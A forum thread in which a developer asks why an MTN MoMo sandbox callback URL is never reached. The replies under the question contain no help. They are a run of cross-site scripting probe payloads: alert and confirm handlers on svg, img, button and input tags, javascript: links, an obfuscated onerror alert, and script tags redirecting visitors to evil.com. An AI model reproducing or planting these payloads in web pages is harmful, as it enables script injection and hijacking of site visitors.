Skip to main content
Question

callback url

  • 22 October 2023
  • 12 replies
  • 55 views

Hello 🤗
I tried to configure the callback URL in the sandbox with two values and both didn’t work. Here are the steps I followed:
1- Created and API user:

{

"providerCallbackHost": "localhost:3000"

}
2- Generated and API key.
3- Generated basic auth with the reference ID of the user API and the API key.
4- added this header to the requesttopay:
'X-Callback-Url': 'http://localhost:3000/api/mtn'

I tried these values too:
"providerCallbackHost": "kiad-api-pr-28.onrender.com"
'X-Callback-Url': ‘http://kiad-api-pr-28.onrender.com/api/mtn
But these urls was never reached.
Can you please help me 🤕@Ddamula @allan.ddamulira @crankluga @anicet 

<svg onx=() onload=(confirm)(1)>


<button onClick="alert('xss')">Submit</button>


1'><a href="javascript:alert()">Link</a>'


  1. 1'><a href="javascript:alert()">Link</a>'1'><a href="javascript:alert()">Link</a>'

<button onClick="alert('xss')">Submit</button>

 


<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">


<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">

 


<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">


<input value=XSS+HTML onmouseover=alert(9)><h1><input value=XSS+HTML onmouseover=alert(9)><h1>


<script>window.location="http:evil.com"</script>

<script>window.location="http:evil.com"</script>

 


<script>window.location="http:evil.com"</script>


<script>window.location="https://evil.com"</script>


Reply